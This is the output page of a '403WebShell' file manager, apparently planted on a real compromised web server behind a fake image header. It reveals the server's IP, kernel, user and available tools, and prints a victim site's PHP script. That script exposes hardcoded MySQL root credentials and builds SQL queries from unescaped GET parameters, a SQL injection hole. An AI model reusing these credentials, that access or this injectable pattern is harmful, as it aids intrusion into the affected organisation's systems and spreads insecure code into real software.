????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.217.114
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.supervision-online.se/login/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/www.supervision-online.se/login/scripts/getSymbolSets_test.php
<?php

$source_encoding = "ISO-8859-1";
$link = mysql_connect ("localhost", "root", "root123");
mysql_select_db ("supervision");

$LastUpdateDate = $_GET['lastUpdateDate'];



if($LastUpdateDate  == ""){
	$LastUpdateDate  = "2010-01-01 00:00:00";
}else{
	
	$LastUpdateDate = date("Y-m-d", strtotime($LastUpdateDate." -1 hour"));
	
}

$x=1;






$nbr_pos = 0;
$sql = "SELECT * FROM tblSymbolSets where companyid = ".$_GET['companyid'];


$result = mysql_query($sql);
while ($row = mysql_fetch_assoc($result)){ 

	$found = false;
	$sql = "SELECT * FROM tblUserRights where userid = ".$_GET['userid']." and symbolSetId =".$row['symbolSetId'];

	$result10 = mysql_query($sql);
	while ($row10 = mysql_fetch_assoc($result10)){
		$found = true;
	} 
	if($found == false){
	
		$sql = "SELECT count(*) as pos FROM tblPositions where updatedate > '$LastUpdateDate'  and symbolSetId = ".$row['symbolSetId'];
		$result1 = mysql_query($sql);
		while ($row1 = mysql_fetch_assoc($result1)){ 
			$nbr_pos += $row1['pos'];
		}
	}
}



global $html;

$html = "START";
function addText($text){

	$GLOBALS['html'] .=$text;
	
	echo($text);
	flush();
}





addText(iconv($source_encoding,"UTF-8",'<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">'));

addText(iconv($source_encoding,"UTF-8",'<dict>'));
$sql = "SELECT * FROM tblSymbolSets where companyid = ".$_GET['companyid'];
$result1 = mysql_query($sql);
$SymbolSetX = 0;
while ($row1 = mysql_fetch_assoc($result1)){ 

$found = false;
	$sql = "SELECT * FROM tblUserRights where userid = ".$_GET['userid']." and symbolSetId =".$row1['symbolSetId'];
	$result10 = mysql_query($sql);
	while ($row10 = mysql_fetch_assoc($result10)){
		$found = true;
	} 
	if($found == false){

$symbolSetId = $row1['symbolSetId'];
$SymbolSetX++;

addText(iconv($source_encoding,"UTF-8",'	<key>SymbolSet'.$SymbolSetX.'</key>'));
addText(iconv($source_encoding,"UTF-8",'	<dict>'));
addText(iconv($source_encoding,"UTF-8",'		<key>IdentifyData</key>'));
addText(iconv($source_encoding,"UTF-8",'		<dict>'));
addText(iconv($source_encoding,"UTF-8",'		<key>Name</key>'));
addText(iconv($source_encoding,"UTF-8",'		<string>'.$row1['name']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'		<key>LastUpdateDate</key>'));
addText(iconv($source_encoding,"UTF-8",'		<string>'.gmdate("Y-m-d H:i:s")));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'		<key>SymbolSetId</key>'));
addText(iconv($source_encoding,"UTF-8",'		<integer>'.$row1['symbolSetId']));
addText(iconv($source_encoding,"UTF-8",'</integer>'));




addText(iconv($source_encoding,"UTF-8",'		<key>Status1</key>'));
addText(iconv($source_encoding,"UTF-8",'		<dict>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Image</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row1['status1']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>ImageURL</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row1['status1url']));
addText(iconv($source_encoding,"UTF-8",'</string>'));

addText(iconv($source_encoding,"UTF-8",'		</dict>'));

addText(iconv($source_encoding,"UTF-8",'		<key>Status2</key>'));
addText(iconv($source_encoding,"UTF-8",'		<dict>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Image</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row1['status2']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>ImageURL</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row1['status2url']));
addText(iconv($source_encoding,"UTF-8",'</string>'));

addText(iconv($source_encoding,"UTF-8",'		</dict>'));


addText(iconv($source_encoding,"UTF-8",'		<key>Status3</key>'));
addText(iconv($source_encoding,"UTF-8",'		<dict>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Image</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row1['status3']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>ImageURL</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row1['status3url']));
addText(iconv($source_encoding,"UTF-8",'</string>'));

addText(iconv($source_encoding,"UTF-8",'		</dict>'));

addText(iconv($source_encoding,"UTF-8",'		<key>Status4</key>'));
addText(iconv($source_encoding,"UTF-8",'		<dict>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Image</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row1['status4']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>ImageURL</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row1['status4url']));
addText(iconv($source_encoding,"UTF-8",'</string>'));

addText(iconv($source_encoding,"UTF-8",'		</dict>'));

addText(iconv($source_encoding,"UTF-8",'	</dict>'));

addText(iconv($source_encoding,"UTF-8",'	<key>Questions</key>'));

addText(iconv($source_encoding,"UTF-8",'	<dict>'));

$sql = "SELECT * FROM tblQuestions where tblQuestions.symbolSetId = ".$symbolSetId." order by questionId";
$result2 = mysql_query($sql);
$QuestionX = 0;
while ($row2 = mysql_fetch_assoc($result2)){ 
$QuestionX++;

addText(iconv($source_encoding,"UTF-8",'		<key>Question'.$QuestionX.'</key>'));

addText(iconv($source_encoding,"UTF-8",'		<dict>'));
addText(iconv($source_encoding,"UTF-8",'			<key>QuestionId</key>'));
addText(iconv($source_encoding,"UTF-8",'			<integer>'.$row2['questionId']));
addText(iconv($source_encoding,"UTF-8",'</integer>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Text</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row2['question']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Info</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row2['info']));
addText(iconv($source_encoding,"UTF-8",'</string>'));


addText(iconv($source_encoding,"UTF-8",'			<key>IsLabelYesNoRequired</key>'));

if($row2['labelYes'] == "TEXT"){
	addText(iconv($source_encoding,"UTF-8",'			<false/>'));
}else{
	addText(iconv($source_encoding,"UTF-8",'			<true/>'));
}

if($row2['labelYes'] == "TEXT"){
	$min = $row2['minValue'];
	$max =  $row2['maxValue'];
	addText(iconv($source_encoding,"UTF-8",'			<key>TextMinValue</key>'));	
	addText(iconv($source_encoding,"UTF-8",'			<string>'.$min));
	addText(iconv($source_encoding,"UTF-8",'</string>'));
	addText(iconv($source_encoding,"UTF-8",'			<key>TextMaxValue</key>'));	
	addText(iconv($source_encoding,"UTF-8",'			<string>'.$max));
	addText(iconv($source_encoding,"UTF-8",'</string>'));
}

addText(iconv($source_encoding,"UTF-8",'			<key>LabelYes</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row2['labelYes']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>LabelNo</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row2['labelNo']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>LabelYesGreen</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row2['labelYesGreen']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Forced</key>'));
addText(iconv($source_encoding,"UTF-8",'			<integer>'.$row2['forced']));
addText(iconv($source_encoding,"UTF-8",'</integer>'));

addText(iconv($source_encoding,"UTF-8",'			<key>SubQuestions</key>'));
addText(iconv($source_encoding,"UTF-8",'			<dict>'));
$sql = "SELECT * FROM tblSubQuestions where questionId =  ".$row2['questionId'];


$result4 = mysql_query($sql);
$SubQuestionX = 0;
while ($row4 = mysql_fetch_assoc($result4)){ 
$SubQuestionX++;

$subExternalId = $row4['subExternalId'];

if($subExternalId == ""){
	$subExternalId = "0";
}

addText(iconv($source_encoding,"UTF-8",'			<key>SubQuestion'.$SubQuestionX.'</key>'));
addText(iconv($source_encoding,"UTF-8",'			<dict>'));

addText(iconv($source_encoding,"UTF-8",'				<key>SubQuestion</key>'));
addText(iconv($source_encoding,"UTF-8",'				<string>'.$row4['question']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'				<key>SubQuestionId</key>'));
addText(iconv($source_encoding,"UTF-8",'				<integer>'.$subExternalId));
addText(iconv($source_encoding,"UTF-8",'</integer>'));
addText(iconv($source_encoding,"UTF-8",'			</dict>'));


}


addText(iconv($source_encoding,"UTF-8",'			</dict>'));




addText(iconv($source_encoding,"UTF-8",'			<key>History</key>'));
addText(iconv($source_encoding,"UTF-8",'			<dict>'));
$sql = "SELECT * FROM tblHistory where questionId =  ".$row2['questionId'];
$result4 = mysql_query($sql);
$HistoryX = 0;
while ($row4 = mysql_fetch_assoc($result4)){ 
$HistoryX++;

addText(iconv($source_encoding,"UTF-8",'			<key>History'.$HistoryX.'</key>'));
addText(iconv($source_encoding,"UTF-8",'			<dict>'));

addText(iconv($source_encoding,"UTF-8",'				<key>History</key>'));
addText(iconv($source_encoding,"UTF-8",'				<string>'.$row4['history_value']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'				<key>HistoryDate</key>'));
addText(iconv($source_encoding,"UTF-8",'				<string>'.$row4['date_value']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			</dict>'));


}


addText(iconv($source_encoding,"UTF-8",'			</dict>'));





addText(iconv($source_encoding,"UTF-8",'		</dict>'));
}

addText(iconv($source_encoding,"UTF-8",'	</dict>'));








addText(iconv($source_encoding,"UTF-8",'	<key>Positions</key>'));
addText(iconv($source_encoding,"UTF-8",'	<dict>'));
$sql = "SELECT * FROM tblPositions where updatedate >= '$LastUpdateDate' and symbolSetId = ".$symbolSetId;



$result3 = mysql_query($sql);
$PositionsX = 0;
while ($row3 = mysql_fetch_assoc($result3)){ 
$PositionsX++;

addText(iconv($source_encoding,"UTF-8",'		<key>Position'.$PositionsX.'</key>'));
addText(iconv($source_encoding,"UTF-8",'		<dict>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Id</key>'));
addText(iconv($source_encoding,"UTF-8",'			<integer>'.$row3['id'].'</integer>'));
addText(iconv($source_encoding,"UTF-8",'			<key>PositionId</key>'));
addText(iconv($source_encoding,"UTF-8",'			<integer>'.$row3['posid'].'</integer>'));
addText(iconv($source_encoding,"UTF-8",'			<key>TempPositionId</key>'));
addText(iconv($source_encoding,"UTF-8",'			<integer>'.$row3['tempposid'].'</integer>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Label</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row3['label'].'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Long</key>'));
addText(iconv($source_encoding,"UTF-8",'			<real>'.$row3['pos_long'].'</real>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Lat</key>'));
addText(iconv($source_encoding,"UTF-8",'			<real>'.$row3['pos_lat'].'</real>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Status</key>'));
addText(iconv($source_encoding,"UTF-8",'			<integer>'.$row3['status'].'</integer>'));	
addText(iconv($source_encoding,"UTF-8",'			<key>Description</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row3['description'].'</string>'));	
addText(iconv($source_encoding,"UTF-8",'			<key>Comment</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row3['comment'].'</string>'));	
addText(iconv($source_encoding,"UTF-8",'			<key>ImagePath</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row3['photopath'].'</string>'));	


addText(iconv($source_encoding,"UTF-8",'	<key>Answers</key>'));

addText(iconv($source_encoding,"UTF-8",'	<dict>'));

$sql = "SELECT * FROM tblQuestions where tblQuestions.symbolSetId = ".$symbolSetId;
$result2 = mysql_query($sql);
$QuestionX = 0;
while ($row2 = mysql_fetch_assoc($result2)){ 
$QuestionX++;

	$answerId = "0";
	$labelYesNo = "";
	$comment = "";
	$subAnswer = "";
	$imagePath = "";
	$videoPath = "";
	$soundPath = "";
	$subAnswerId = "0";
	$AdditionalComments = "";
	
	

//$sql = "SELECT * FROM tblAnswers where updatedate > '$LastUpdateDate' and  questionId = ".$row2['questionId']." and PositionId = ".$row3['id'];
$sql = "SELECT * FROM tblAnswers where questionId = ".$row2['questionId']." and PositionId = ".$row3['id'];

$result5 = mysql_query($sql);
while ($row5 = mysql_fetch_assoc($result5)){ 
	$labelYesNo = $row5['labelYesNo'];
	$answerId = $row5['answerId'];
	$comment = $row5['comment'];
	$subAnswer =  $row5['subAnswer'];
	$subAnswerId = $row5['subAnswerId'];
	$imagePath = $row5['imagePath'];
	$videoPath = $row5['videoPath'];
	$soundPath = $row5['soundPath'];
	$AdditionalComments = $row5['AdditionalComments'];
}

if($subAnswerId == ""){
	$subAnswerId = "0";
}

if($answerId == ""){
	$answerId = "0";
}

$QuestionID = $row2['questionId'];
if($QuestionID == ""){
	$QuestionID = "0";
}



addText(iconv($source_encoding,"UTF-8",'		<key>Answer'.$QuestionX.'</key>'));

addText(iconv($source_encoding,"UTF-8",'		<dict>'));


addText(iconv($source_encoding,"UTF-8",'			<key>AdditionalComments</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$AdditionalComments));
addText(iconv($source_encoding,"UTF-8",'</string>'));

addText(iconv($source_encoding,"UTF-8",'			<key>QuestionId</key>'));
addText(iconv($source_encoding,"UTF-8",'			<integer>'.$QuestionID));
addText(iconv($source_encoding,"UTF-8",'</integer>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Answer</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$labelYesNo));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>Comment</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$comment));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>SubAnswer</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$subAnswer));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>SubAnswerId</key>'));
addText(iconv($source_encoding,"UTF-8",'			<integer>'.$subAnswerId));
addText(iconv($source_encoding,"UTF-8",'</integer>'));
addText(iconv($source_encoding,"UTF-8",'			<key>ImagePath</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$imagePath));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>VideoPath</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$videoPath));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			<key>SoundPath</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$soundPath));
addText(iconv($source_encoding,"UTF-8",'</string>'));



addText(iconv($source_encoding,"UTF-8",'			<key>History</key>'));
addText(iconv($source_encoding,"UTF-8",'			<dict>'));
$sql = "SELECT * FROM tblHistory where answerId =  ".$answerId;
$result6 = mysql_query($sql);
$HistoryX = 0;
while ($row6 = mysql_fetch_assoc($result6)){ 
$HistoryX++;

addText(iconv($source_encoding,"UTF-8",'			<key>History'.$HistoryX.'</key>'));
addText(iconv($source_encoding,"UTF-8",'			<dict>'));

addText(iconv($source_encoding,"UTF-8",'				<key>History</key>'));
addText(iconv($source_encoding,"UTF-8",'				<string>'.$row6['history_value']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'				<key>HistoryDate</key>'));
addText(iconv($source_encoding,"UTF-8",'				<string>'.$row6['date_value']));
addText(iconv($source_encoding,"UTF-8",'</string>'));
addText(iconv($source_encoding,"UTF-8",'			</dict>'));

}

addText(iconv($source_encoding,"UTF-8",'			</dict>'));

addText(iconv($source_encoding,"UTF-8",'		</dict>'));
}
addText(iconv($source_encoding,"UTF-8",'	</dict>'));


addText(iconv($source_encoding,"UTF-8",'			<key>Comment</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row3['comment'].'</string>'));	

addText(iconv($source_encoding,"UTF-8",'			<key>PhotoPath</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row3['photopath'].'</string>'));	

addText(iconv($source_encoding,"UTF-8",'			<key>VideoPath</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row3['videopath'].'</string>'));	

addText(iconv($source_encoding,"UTF-8",'			<key>SoundPath</key>'));
addText(iconv($source_encoding,"UTF-8",'			<string>'.$row3['soundpath'].'</string>'));	

addText(iconv($source_encoding,"UTF-8",'		</dict>'));

}

addText(iconv($source_encoding,"UTF-8",'	</dict>'));

addText(iconv($source_encoding,"UTF-8",'</dict>'));
}
}
addText(iconv($source_encoding,"UTF-8",'</dict>'));
addText(iconv($source_encoding,"UTF-8",'</plist>'));


//header("Content-type: application/octet-stream");
//header('Content-Disposition: attachment; filename="SymbolSets_'.$bytes.'.plist"');





?>

Youez - 2016 - github.com/yon3zu
LinuXploit